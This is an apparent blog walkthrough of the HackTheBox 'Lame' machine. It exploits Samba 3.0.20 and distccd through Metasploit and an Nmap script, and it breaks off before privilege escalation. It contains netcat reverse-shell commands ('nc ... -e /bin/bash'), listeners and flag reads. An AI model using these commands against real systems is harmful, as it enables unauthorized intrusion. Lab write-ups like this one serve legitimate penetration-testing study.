Lame — HackTheBox
Lame is an easy beginner-friendly machine based on a Linux server. It is a good start for a person who started practices for OSCP. This machine Contains several ways to compromise. Let's do it

First, we will do Nmap for all port scanning and vulnerability checks.
>mkdir nmap
>nmap -sC -p- -sV -oS nmap/basic.out
The above-mentioned command runs the Nmap default script engine and service version detection on all ports. The result for the above scanning is displayed below
In the above results, we can see some of the ports are open
ftp- 21 vsftpd 2.3.5
ssh-22 ssh OpenSSH-4.7p1
NetBIOS smb 139 3x-4x
samba — 445 smbd-3.0.20
distccd — 3632
The FTP service version vsftpd having anonymous login allowed here. you can check the details in the Nmap result. well, I will log in via FTP. But nothing found there. It's empty. and gaining access via FTP is not working here. So we can go for port 445 smb 3.0.20 which is having a vulnerability.
let's check whether is there any vulnerability for smb 3.0.20 via searchsploit.
>searchsploit smb 3.0.20

This samba version having several exploitation scripts. first, we can go for the Metasploit framework.
>msfconsole -q
>search username map script

>use exploit/multi/samba/usermap_script
then we have to set values in this usermap_script
>show options

>set RPORT 445
>set LHOST
>show options

After executing usermap_script we got the initial access and also root access.
So that we can capture both user and root flags. But before that, I will check for the presence of python to do a shell spawning.
>python — version
Python 2.5.2 is installed there. so we can do shell spawning using python
> python -c ‘import pty;pty.spawn(“/bin/bash”)’

Now let's check for the root and user flags in their home directories.
>cat /home/makis/user.txt
>cat /root/root.txt
There is another way to compromise the target server. the port 3632 is open running distccd. Let's check is there any vulnerability related to the specified service
>nmap -p 3632 --script vuln -sV -oS nmap/nmap.vul.out
the result displays below.
In the above result, you can see a vulnerability distcc-cve2004–2687 associated with this distccd. let's check for the exploit code in searchsploit.
>searchsploit distcc

the code is there in the Metasploit framework.
>msfconsole -q
>search distcc
>use exploit/unix/misc/distcc_exec
>set payload cmd/unix/generic
>set CMD nc 1122 -e /bin/bash
the above-mentioned commands will execute the CMD value in the target server. So start a listener using Netcat.
>nc -nvlp 1122
then run the Metasploit script

we got the initial access.
before privilege escalation, we can do the same gaining access without the Metasploit
On the map official page, they are explaining the way to execute codes remotely. Let's do that

execute the above-mentioned script to gain access. First set a listener on our computer using Netcat. then execute it.
>nc -nvlp 1122
>nmap -Pn -n -p3632 — script distcc-cve2004–2687 — script-args=”distcc-cve2004–2687.cmd=’nc 1122-e /bin/bash’”
It will give you initial access to the target server.

Now let's do shell spawning to get a good interactive tty shell. already python is there. let's execute a python shell spawning script
>python -c ‘import pty;pty.spawn(“/bin/bash”)’
by executing uname -a we can see the OS details
>uname -a
it shows that the target server is Linux 2.6.24–16 server. There are so many kernel exploits are available in exploitdb. Let's do it.
……I will add remaining after some time……
thanks for reading. Hope it would be useful to you. If any errors, then contact me via LinkedIn.